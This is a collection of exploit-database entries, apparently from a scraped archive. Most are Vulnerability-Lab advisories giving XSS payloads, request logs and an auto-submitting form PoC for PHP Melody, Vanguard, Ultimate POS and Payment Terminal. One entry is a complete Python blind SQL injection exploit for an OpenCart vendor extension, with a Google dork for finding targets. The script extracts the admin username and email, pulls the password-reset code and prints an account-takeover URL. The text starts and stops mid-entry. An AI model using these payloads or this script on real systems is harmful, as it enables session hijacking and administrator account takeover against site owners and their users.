all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS) # Date: 2021-10-21 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.phpsugar.com/phpmelody.html Document Title: =============== PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2291 Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/ Release Date: ============= 2021-10-21 Vulnerability Laboratory ID (VL-ID): ==================================== 2291 Common Vulnerability Scoring System: ==================================== 5.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS. (Copy of the Homepage: https://www.phpsugar.com/phpmelody.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application. Affected Product(s): ==================== PHPSUGAR Product: PHP Melody v3.0 - Video CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-09-04: Vendor Response/Feedback (Security Department) 2021-09-22: Vendor Fix/Patch (Service Developer Team) 2021-09-22: Security Acknowledgements (Security Department) 2021-10-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class. Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a public execution by users oder administrators. The request method to inject is get and after save in dbms via post method the attack vector becomes persistent. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Editor - Videos (WYSIWYG - tinymce) Vulnerable File(s): [+] edit-episode.php Vulnerable Parameter(s): [+] episode_id Affected Module(s): [+] description Proof of Concept (PoC): ======================= The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Payload <p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">" href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p> --- PoC Session Logss (GET) [WYSIWYG] --- https://phpmelody.localhost.com:8080/admin/[PWND] Host: phpmelody.localhost.com:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1 Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin - GET: HTTP/2.0 200 OK content-type: text/html; vary: Accept-Encoding Vulnerable Source: Video Editor (WYSIWYG - tinymce) <textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;" aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">" href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea> <span class="autosave-message"></span> </div></div> Reference(s): https://phpmelody.localhost.com:8080/admin/ https://phpmelody.localhost.com:8080/admin/edit-episode.php https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1 Solution - Fix & Patch: ======================= Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS) # Date: 2021-10-26 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975 # Version: 2.1 Document Title: =============== Vanguard v2.1 - (Search) POST Inject Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2283 Release Date: ============= 2021-10-26 Vulnerability Laboratory ID (VL-ID): ==================================== 2283 Common Vulnerability Scoring System: ==================================== 4 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application. Affected Product(s): ==================== VanguardInfini Product: Vanguard v2.1 - CMS (PHP) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-10-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application. The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user session data or to manipulate application contents for clients. The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post injection web vulnerability with non-persistent attack vector. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request method(s): [+] POST Vulnerable Input(s): [+] Search Vulnerable Parameter(s): [+] phps_query Proof of Concept (PoC): ======================= The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: search <div class="ui yellow basic segment"></div> <div class="ui container" style="margin-top: -0.7em;"> <form method="POST" action="https://vanguard.squamifer.ovh/search"> <div class="ui action input fluid"> <input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product..."> <button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form> <div class="ui divider"></div> <div class="ui cards aligned centered"> <div class="alert color blue-color"><div class="ui hidden divider"></div> <div class="ui icon info message"><i class="help circle icon"></i><div class="content"> <div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div> </div></div></div> --- PoC Session Logs [POST] --- https://vanguard.localhost:8080/search Host: vanguard.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: https://vanguard.localhost:8080 Connection: keep-alive Referer: https://vanguard.localhost:8080/ Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8 phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;) - POST: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 pragma: no-cache cache-control: private vary: Accept-Encoding Exploitation: PoC <html> <head> <title>PoC</title> <style type="text/css"> #nodisplay { display:none; } </style> </head> <body> <div id="nodsiplay"> <form action="https://vanguard.localhost:8080/search" method="post"> <input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/> </form> </div> <script> function submitForm() { document.forms[0].submit(); } submitForm(); </script> </body> </html> Security Risk: ============== The security risk of the validation web vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS) # Date: 2021-10-26 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/ # Version: 4.4 Document Title: =============== Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2296 Release Date: ============= 2021-10-26 Vulnerability Laboratory ID (VL-ID): ==================================== 2296 Common Vulnerability Scoring System: ==================================== 5.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== The Ultimate POS is a erp, stock management, point of sale & invoicing web-application. The application uses a mysql database management system in combination with php 7.2. (Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ ) Abstract Advisory Information: ============================== Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application. Affected Product(s): ==================== thewebfosters Ultimate POS v4.4 - ERP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-10-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent validation web vulnerability is located in the name parameter of the add products module. Remote attackers with privileges as vendor to add products are able to inject own malicious script codes. The request method to inject is post and the attack vector is persistent. Injects are possible via edit or by a new create of a product. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Products (Add) Vulnerable Input(s): [+] Product Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] Products List Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload test"><iframe src="evil.source" onload=alert(document.cookie)></iframe> test"><img src="evil.source" onload=alert(document.cookie)></img> ---- PoC Session Logs (POST) [Add] --- https://pos-uf.localhost.com:8000/products Host: pos-uf.localhost.com:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599 Content-Length: 3931 Origin: https://pos-uf.localhost.com:8000 Connection: keep-alive Referer: https://pos-uf.localhost.com:8000/products/create Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9 _token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id= &category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure= &weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive &type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 location: https://pos-uf.localhost.com:8000 set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly ---- PoC Session Logs (POST) [Edit] --- https://pos-uf.localhost.com:8000/products/23 Host: pos-uf.localhost.com:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867 Content-Length: 4064 Origin: https://pos-uf.localhost.com:8000 Connection: keep-alive Referer: https://pos-uf.localhost.com:8000/products/23/edit Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D _method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2 &woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00 &profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 location: https://pos-uf.localhost.com:8000/products set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly Vulnerable Source: Products (list - name) <tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td"> <input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;"> <img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td> <td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false"> Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li> <a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode"> </i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li> <li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li> <a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider"> </li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database"> </i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history"> </i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy"> </i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe> <br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td> <div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td> <td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even"> <td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;"> <img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td> Reference(s): https://pos-uf.localhost.com:8000/products/ https://pos-uf.localhost.com:8000/products/view/ https://pos-uf.localhost.com:8000/products/23/edit Solution - Fix & Patch: ======================= The vulnerability can be resolved by the following steps ... 1. Restrict the input on product names to disallow special chars 2. Encode and filter the input transmitted via post in the name parameter 3. Escape and sanitize the output in the products listing of the backend Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection # Author: Muhammad Zaki Sulistya (zaki.sulistya@gmail.com) # Date: 03-11-2021 # Product: TMD Vendor System # Vendor Homepage: https://www.opencartextensions.in/ # Software Link: https://www.opencartextensions.in/opencart-multi-vendor-multi-seller-marketplace # Version: TMD Vendor System 3.x # Tested on: MacOS # Google Dork: inurl:index.php?route=vendor/allseller # Info: Patched on the new version #!/usr/bin/python import requests from bs4 import BeautifulSoup from random import randint import time class TmdSqli: def __init__(self, url): self.char_list = ['.',':', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'] self.url = url self.user_agents = [] self.set_user_agent() self.is_vulnerable() def set_user_agent(self): if len(self.user_agents) == 0: r = requests.get( 'https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt').text self.user_agents = r.split("\n") def get_content(self, url): try: n = randint(0, 999) headers = {} headers['user-agent'] = self.user_agents[n] req = requests.get(url, headers=headers) soup = BeautifulSoup(req.content, 'html.parser') return soup.find(id='content') except requests.exceptions.ConnectionError as e: print("CONNECTION ERROR:", e) time.sleep(60) self.get_content(url) def is_vulnerable(self): url_injection_true = self.url + "' AND 1=1--+-" url_injection_false = self.url + "' AND 1=0--+-" default_response = self.get_content(self.url) injection_true = self.get_content(url_injection_true) injection_false = self.get_content(url_injection_false) if (default_response == injection_true) and (default_response != injection_false): print("The target is vulnerable") self.injection_true = injection_true row_length = self.user_data_length() self.dump_data(row_length) else: print("Not vulnerable") def user_data_length(self): n = 1 while True: request_url = self.url + "' AND (SELECT LENGTH(CONCAT(username,0x3a,email)) FROM oc_user LIMIT 0,1)=" + str(n) + "--+-" req = self.get_content(request_url) if req != self.injection_true: n += 1 else: print("Row length : " + str(n)) return n break def reset_code_length(self): n = 1 while True: request_url = self.url + "' AND (SELECT LENGTH(CONCAT(code)) FROM oc_user WHERE username = '" + self.username + "')=" + str( n) + "--+-" req = self.get_content(request_url) if req != self.injection_true: n += 1 else: print("Row length : " + str(n)) return n break def dump_data(self, length): data = "" for i in range(1, length + 1): for j in self.char_list: j = ord(j) request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(username,0x3a,email), " + str(i) + ",1)) FROM oc_user LIMIT 0,1)=" + str(j) + "--+-" req = self.get_content(request_url) if req == self.injection_true: data += chr(j) print("Get : " + data) user_data = data.split(":") self.username = user_data[0] self.email = user_data[1] self.reset_password() def dump_reset_code(self, length): data = "" for i in range(1, length + 1): for j in self.char_list: j = ord(j) request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(code), " + str( i) + ",1)) FROM oc_user WHERE username = '" + self.username + "')=" + str(j) + "--+-" req = self.get_content(request_url) if req == self.injection_true: data += chr(j) print("Get : " + data) return data def reset_password(self): self.admin_page = input("Admin page URL : ") request_url = self.admin_page + '/index.php?route=common/forgotten' post_data = {'email':self.email} req = requests.post(request_url, data=post_data) if req.status_code == 200: row_length = self.reset_code_length() reset_code = self.dump_reset_code(row_length) reset_password_url = self.admin_page + '/index.php?route=common/reset&code=' + reset_code print("Gotcha!") print("username : " + self.username) print("You can reset the password : " + reset_password_url) print("TARGET URL ex: https://[redacted]]/index.php?route=product/product&product_id=[product_id]") target = input("Target URL : ") TmdSqli(target)

# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS) # Date: 2021-11-05 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.criticalgears.com/ # Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) https://www.criticalgears.com/product/stripe-payment-terminal/ ) # Version: 2.4.1, 2.2.1 & 3.1 # Tested on: Linux (Apache) Document Title: =============== Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2280 Release Date: ============= 2021-11-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2280 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Quick and easy payment terminal as script for clients to pay for products and services. (Copy of the Homepage:https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) (Copy of the Homepage:https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) (Copy of the Homepage:https://www.criticalgears.com/product/stripe-payment-terminal/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1. The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1. The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1. Affected Product(s): ==================== CriticalGears Product: Authorize.net Payment Terminal 2.4.1 - Payment Formular Script (PHP) (Web-Application) Product: Stripe Payment Terminal v2.2.1 - Payment Formular Script (PHP) (Web-Application) Product: PayPal PRO Payment Terminal v3.1 - Payment Formular Script (PHP) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-22: Researcher Notification & Coordination (Security Researcher) 2021-08-23: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-11-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation 